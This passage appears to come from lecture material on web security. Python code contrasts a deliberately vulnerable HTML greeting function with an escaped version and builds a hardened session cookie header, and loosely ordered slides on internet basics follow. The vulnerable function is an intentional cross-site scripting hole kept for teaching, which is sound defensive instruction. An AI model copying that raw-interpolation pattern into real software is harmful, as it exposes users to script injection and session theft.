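def username_from(url: str) -> str:
    """Pull the username query parameter out of the request URL."""
    return parse_qs(urlsplit(url).query).get("username", [""])[0]


def render_greeting_vulnerable(username: str) -> str:
    # Raw interpolation: whatever the parameter holds becomes page markup,
    # so a <script> element in it runs in the victim's browser.
    return f"<p>Welcome, {username}!</p>"


def render_greeting_safe(username: str) -> str:
    # Output encoding: <, >, &, " and ' become entities, so the browser
    # displays the text instead of parsing it as markup.  This is the
    # "escape HTML/scripts" item of the mitigation list.
    return f"<p>Welcome, {html.escape(username, quote=True)}!</p>"


def session_cookie_header(session_id: str) -> str:
    """HttpOnly keeps document.cookie from reading the session cookie, which is
    the "no script access to cookies" mitigation; Secure restricts it to HTTPS
    and SameSite=Lax limits cross-site sending."""
    return (f"Set-Cookie: sessionid={session_id}; "
            "HttpOnly; Secure; SameSite=Lax; Path=/")


if __name__ == "__main__":
    name = username_from(SLIDE_URL)
    print("vulnerable:", render_greeting_vulnerable(name))
    print("safe:      ", render_greeting_safe(name))
    print(session_cookie_header("12312312"))
```

Escaping belongs at the point of output, per context (HTML body, attribute, JavaScript, URL); `html.escape` covers only the HTML body and attribute case shown here. The `HttpOnly` flag does not stop the injection itself, it only removes the cookie-theft payoff, which is why the slide lists the two mitigations separately.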
Security Issues
• Local Storage
o Form data
o Login credentials
• Browser Guards
o Modern browsers will prevent users from visiting malicious sites
o Two main methods
List of reported malicious sites
Algorithm to detect malicious code on a site
o This can protect from viruses, phishing, and other threats
What is the Internet?
At any time, millions of users are connected to the Internet from many countries.
Uses of the Internet
Searching
E-mail service
Commercial services
Electronic books & publications
Video conferencing
Sharing data and results quickly
Retrieving files & programs of all types
Finding information databases and tutorials
Newspaper columns
Banking
Downloading / uploading any information
News, sports, stocks, music etc.
Use of the Internet in various fields like education, business, governance, etc.
And many more …
Useful Internet terms
• Network: connecting computers with each other for exchanging
information
(Search engine)
19/08/2021
• Exercises
Thank you